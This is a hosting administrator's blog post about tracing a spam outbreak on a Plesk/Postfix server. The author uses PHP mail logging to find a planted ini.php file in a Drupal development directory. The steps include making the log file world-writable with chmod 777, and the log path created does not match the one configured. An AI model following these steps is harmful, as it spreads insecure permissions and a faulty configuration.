Monthly Archives: January 2015

Parallels Plesk Postfix Mail Queue Spam Issue

Over the weekend I noticed that SMTP traffic on one of the domains I host was sending an abnormal amount of SMTP traffic. In Parallels Plesk the Postfix Mail Queue showed upwards of 65,000 emails stuck in the queue. This was especially alarming because the domain does not have any email accounts. Based on the domain traffic activity report within Plesk it was clear that the emails were coming from domain.com.

I spent some time searching the internet and found a few very valuable pieces of information:

I should also mention that Plesk 12 has a new feature which allows you to set limits on outgoing mail flow. The first step I took was to restrict mail flow for domain.com. You can control mail flow at the following levels from within the Plesk Control Panel; Default per Mailbox, Default per Domain, Default per Subscription.

Here are the steps I took to resolve the Postfix Spam problem:

Step 1) I set the outgoing mail flow to 0 for the domain in question. I then ran some of the built in Plesk tools such as Watchdog security scan. Watchdog threw a couple of warnings but there weren’t any issues other than normal alerts (SSH enabled, root access, etc.).

Step 2) In PHP 5.3.0. developers created a brilliant way to track emails sent via PHP scripts. In order to use this new feature you have to create a log file for PHP to write to:

  • Create log file
    touch /var/log/php-mail.log
    
  • Change permissions of log file
    chmod 777 /var/log/php-mail.log
    

Step 3) Once you create the log file and change the permissions for PHP you need to log into Parallels Plesk and modify the PHP settings: (specific to the domain in question)

  • Modify PHP settings for suspect domain
    • Added the following entries
      add_x_header = On
      mail.log = /var/log/phpmail.log
      

Parallels Plesk PHP parameters (domain specific)

Step 4) After a short period of time (less that a minute) the log file began to fill with data:

mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit

Based on the data I was able to identify the following file: /var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php. This file was embedded within the suspect domains website directory. I am not totally sure how it got there but my guess is through an exploit in Drupal or an incorrect permission as I was developing a new website in Drupal.

I moved the file to a different directory, changed its permissions and downloaded it from the server for further investigation. Since the removal of this file there have been no further issues with the domain sending spam.

Due to this issue I have changed all passwords. Depending on what I find I may even look at an entire rebuild however I don’t believe it is required.

If you have had any similar issues please share or if you think missed something please let me know.